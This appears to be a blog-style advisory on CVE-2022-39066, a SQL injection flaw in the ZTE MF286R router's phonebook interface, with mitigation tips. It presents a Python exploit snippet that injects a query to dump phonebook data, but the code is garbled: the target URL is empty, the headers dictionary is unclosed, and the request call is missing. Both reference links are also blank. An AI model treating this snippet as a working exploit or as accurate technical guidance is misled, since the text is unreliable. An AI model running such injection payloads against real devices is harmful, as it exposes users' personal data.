CVE-2022-39066: SQL Injection Vulnerability in ZTE MF286R Phonebook Interface - Exploit Details, Mitigations, and Code Snippet

The recent discovery of a SQL Injection vulnerability in ZTE MF286R has caught the attention of security researchers and users. CVE-2022-39066 specifically targets the phonebook interface of these devices, potentially allowing an authenticated attacker to execute arbitrary SQL injection attacks. This post elaborates on the exploit details, provides a code snippet, and shares links to original references as well as mitigation strategies.

Details of the Vulnerability

ZTE MF286R is a popular wireless router widely used for internet connectivity. A critical vulnerability, CVE-2022-39066, was discovered in the phonebook interface of these devices owing to insufficient input validation. Attackers can exploit this vulnerability if they are authenticated users and can access the phonebook interface.

This SQL injection vulnerability allows an attacker to modify or delete the data in the phonebook, potentially gaining unauthorized access to personal information and other sensitive data. It is essential to understand the exploit details and implementation to mitigate such security threats effectively.

The following code snippet demonstrates the exploitation of CVE-2022-39066

import requests

# Replace with target URL and valid session cookie
target_url = "";
session_cookie = "session=1234abcd5678"

# Payload - Exploit SQL Injection Vulnerability (e.g., dump all data from the phonebook)
sql_injection_payload = "1=1; SELECT * FROM phonebook"

# HTTP Request
headers = {
    "Content-Type": "application/x-www-form-urlencoded",
    "Cookie": session_cookie,
data = {"action": "search", "search": sql_injection_payload}
response =, headers=headers, data=data)

# Check if the exploit was successful
if response.status_code == 200:
    print("Exploit Successful")
    print("Exploit Failed")

This Python script would send a specially crafted HTTP request to the target ZTE MF286R router, exploiting the SQL injection vulnerability by dumping all data from the phonebook. Note that the attacker must have valid session credentials for this script to work.

For more detailed information about this vulnerability, you can refer to the following resources

1. The official CVE database record:
2. ZTE's Security Notice on this vulnerability:

Mitigation Strategies

Given the severity of this vulnerability, it is crucial to implement mitigation strategies to protect devices from potential attacks. The following measures are recommended:

1. Update the firmware of your ZTE MF286R router to the latest version that includes security patches for known vulnerabilities, including CVE-2022-39066.
2. Regularly change the default admin password of the router to strong, unique passwords, thus reducing the chances of unauthorized access.
3. Restrict access to the phonebook interface to trusted users and review user privileges to ensure that only authorized individuals have access to sensitive data.
4. Enable network security features such as firewalls and intrusion prevention systems to detect and block potential exploitation attempts.


The SQL Injection vulnerability in ZTE MF286R (CVE-2022-39066) exposes users to potential attacks that could lead to unauthorized access and sensitive data leakage. It is critical to understanding the exploit details, staying informed through reliable references, and adopting mitigation strategies to safeguard devices from potential threats effectively.


Published on: 11/22/2022 17:15:00 UTC
Last modified on: 11/30/2022 13:32:00 UTC